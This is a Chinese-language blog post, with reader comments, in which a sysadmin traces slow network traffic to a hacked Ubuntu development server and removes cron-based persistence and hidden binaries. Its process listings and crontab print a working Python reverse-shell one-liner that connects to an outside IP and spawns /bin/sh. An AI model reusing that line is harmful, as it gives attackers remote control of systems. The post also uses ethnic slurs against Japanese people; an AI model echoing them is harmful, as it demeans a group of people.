网站首页 文章专栏 某个小日本你个鬼孙黑客,胆敢犯我大中华linux 服务器
某个小日本你个鬼孙黑客,胆敢犯我大中华linux 服务器
编辑时间:June 14, 2017, 3:53 p.m. 作者:赵彦昌 浏览量:3890

 

   今天来和大家聊聊神秘的黑客,本人有时,也很好奇,他们就为什么能找到系统或某个软件的漏洞的呢?真的都是很懂某个领域,逐行读代码吗?

    当然今天不是在教你怎么做一个黑客,而是在讲刚刚我遇到的一个小日本的黑客在偷偷地黑了本公司的一台线下ubuntu开发服务器,

root@development:~# uname -a
Linux development 3.13.0-119-generic #166-Ubuntu SMP Wed May 3 12:18:55 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

    这要从上两个星期说起,一天中午回来,突然发现速度好卡,Ping 网关,有时会丢包,想着有回路,OK ,半个小时查到一根网线,的确不对头,一插到交换机上,就延迟大,更甚时,根本上不去网。果断拔掉,不关它,谁上不去网了,自会来找我。

    好了,言归正转。昨天又发现网速不行了,可没有那么凶猛。感觉 软棉棉地,时不时,延迟大点,时不时又非常正常了。登陆路由发现总的上行达到1000000k还多,不应该啊,我们的上行没那么大啊。怀疑有主机的后台软件恶意上传东西,查了一下,越多的也就有一台开发用的服务器上传最高200多k,时不时。不对,如果普通员工上传200多k 是正常现象,可一台服务器我没操作不可能 那么高啊。

    百度一下,linux 网络监控命令找到一个原生的ifstat ,执行一下,发现上传eth0 接口119146kb/s,可这个命令不太直观,不能看到哪个进程整的坏。再百度找到 nethogs 命令 ubuntu系统安装 apt-get install nethogs  如果报错:  点这里

    

sudo nethogs eth0





发现一个IP 为150.95.146.116 ,一查,MD小日本

root@development:~# netstat -natp | grep 150.95.146.116
tcp        0      1 192.168.2.246:58584     150.95.146.116:7890     SYN_SENT    28101/python    
tcp        0      1 192.168.2.246:57519     150.95.146.116:42289    SYN_SENT    2400/gettyy     
tcp        0      1 192.168.2.246:57433     150.95.146.116:7890     SYN_SENT    26518/python    
tcp        0      1 192.168.2.246:58005     150.95.146.116:7890     SYN_SENT    26667/python
root@development:~# ps -ef | grep python
oneapm-+  1522     1  0 Jun12 ?        00:00:28 /opt/oneapm-ci-agent/embedded/bin/python /opt/oneapm-ci-agent/bin/supervisord -c /etc/oneapm-ci-agent/supervisor.conf --pidfile /opt/oneapm-ci-agent/run/oneapm-agent-supervisord.pid
oneapm-+  1526  1522  0 Jun12 ?        00:01:46 /opt/oneapm-ci-agent/embedded/bin/python /opt/oneapm-ci-agent/agent/onestatsd.py --use-local-forwarder
oneapm-+  1527  1522  0 Jun12 ?        00:02:00 /opt/oneapm-ci-agent/embedded/bin/python /opt/oneapm-ci-agent/agent/forwarder.py
oneapm-+  1528  1522  0 Jun12 ?        00:02:50 /opt/oneapm-ci-agent/embedded/bin/python /opt/oneapm-ci-agent/agent/agent.py foreground --use-local-forwarder
root      4882  3539  0 09:31 ?        00:00:03 /usr/bin/python /usr/bin/supervisord -n -c /etc/supervisord.conf
root      5000  3370  0 09:31 ?        00:00:00 /usr/sbin/uwsgi --pidfile /var/run/uwsgi2.pid -i /etc/pythonapp/confcenter.ini
root      5128  5000  0 09:31 ?        00:00:00 /usr/sbin/uwsgi --pidfile /var/run/uwsgi2.pid -i /etc/pythonapp/confcenter.ini
root     28235 28233  0 14:17 ?        00:00:00 /bin/sh -c /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.95.146.116",7890));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
root     28236 28235  0 14:17 ?        00:00:00 /usr/bin/python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.95.146.116",7890));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
root     28454 28445  0 14:18 ?        00:00:00 /bin/sh -c /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.95.146.116",7890));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
root     28455 28454  0 14:18 ?        00:00:00 /usr/bin/python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.95.146.116",7890));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
root     28505 17313  0 14:18 pts/11   00:00:00 grep --color=auto python
root@development:~# ps -ef | grep 28233
root     28233  1260  0 14:17 ?        00:00:00 CRON
root     28235 28233  0 14:17 ?        00:00:00 /bin/sh -c /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.95.146.116",7890));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
root     28567 17313  0 14:18 pts/11   00:00:00 grep --color=auto 28233
cat /etc/crontab

* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("150.95.146.116",7890));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

*/3 * * * * root /etc/cron.hourly/cron.sh


修改/etc/crontab 不成功,提示没权限,ll 一看有写权限啊,想到 chattr -i /etc/crontab 再修改ok

接下来同样的方法 chattr -i /usr/bin/gettyy  && rm /usr/bin/gettyy && chattr -i /usr/bin/.sshd && /bin/rm -rf /usr/bin/.sshd

 chattr -i /usr/bin/gettyy  && rm /usr/bin/gettyy && chattr -i /usr/bin/.sshd && /bin/rm -rf /usr/bin/.sshd


cat

/etc/cron.hourly/cron.sh 把里面的cp 源文件 和目标文件 删除了,这里忘截图 了

rm -rf /lib/udev/udev


这恶心的自我复制,重命名。垃圾地定时循环。操,滚出地球

root@development:~# netstat -natp
干净了 







来说两句吧
最新评论
  • 未知
    未知

    six six six[偷笑]


  • 未知
    未知
    按照 你的方法,是可以 了,但一重启又是这个样子还要再kill 一边。大神没有遇到吗?